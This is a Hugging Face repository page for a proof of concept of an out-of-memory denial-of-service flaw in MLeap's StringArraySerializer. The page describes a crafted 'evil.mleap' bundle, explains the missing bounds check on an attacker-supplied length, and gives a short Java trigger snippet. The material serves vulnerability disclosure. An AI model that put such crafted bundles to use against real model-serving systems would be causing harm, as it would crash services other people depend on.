Hugging Face's logo

wulonchia
/
mleap-stringarray-oom-poc

Model card Files
xet
 Community

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

MLeap StringArraySerializer OOM PoC

Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's StringArraySerializer.read.

Files

  • evil.mleap: crafted MLeap bundle ZIP. Loading it triggers OutOfMemoryError via new Array[Byte](0x7FFFFFFF) in StringArraySerializer.read.

Reproduce 

import struct, zipfile, io, base64
from mleap.pyspark.spark_support import SimpleSparkSerializer
# Or load via BundleFile in Scala/Java:
# BundleFile.load("evil.mleap")

Root Cause

StringArraySerializer.read calls din.readInt() on attacker-controlled bytes and passes the result directly to new Array[Byte](size) with no bounds check. OutOfMemoryError extends VirtualMachineError; Scala's NonFatal extractor returns false for it, so the surrounding Try{} does not catch it — the error propagates and crashes the process.

Trigger (Java) 

DataInputStream din = new DataInputStream(
    new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
int size = din.readInt();       // 2147483647
byte[] bytes = new byte[size];  // OutOfMemoryError: Requested array size exceeds VM limit
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support